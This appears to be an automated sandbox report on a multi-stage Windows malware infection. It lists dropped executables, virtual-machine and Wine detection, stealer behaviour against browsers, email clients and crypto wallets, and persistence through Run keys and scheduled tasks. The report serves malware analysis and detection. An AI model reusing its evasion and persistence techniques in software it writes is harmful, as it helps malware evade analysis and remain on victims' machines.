Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\nsrxg\xjed.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\nsrxg\xjed.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\nsrxg\xjed.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\nsrxg\xjed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\ProgramData\nsrxg\xjed.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aefcdccbdabeec = "\"C:\\ProgramData\\aefcdccbdabeec.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aefcdccbdabeec = "\"C:\\ProgramData\\aefcdccbdabeec.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18fe45c985.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\18fe45c985.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0c8f5528a7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10016830101\\0c8f5528a7.exe" C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aefcdccbdabeec = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10089420101\\4klgwMz.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_18364.exe" C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe" C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
File created C:\Windows\Tasks\futors.job C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\nsrxg\xjed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856214946406513" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
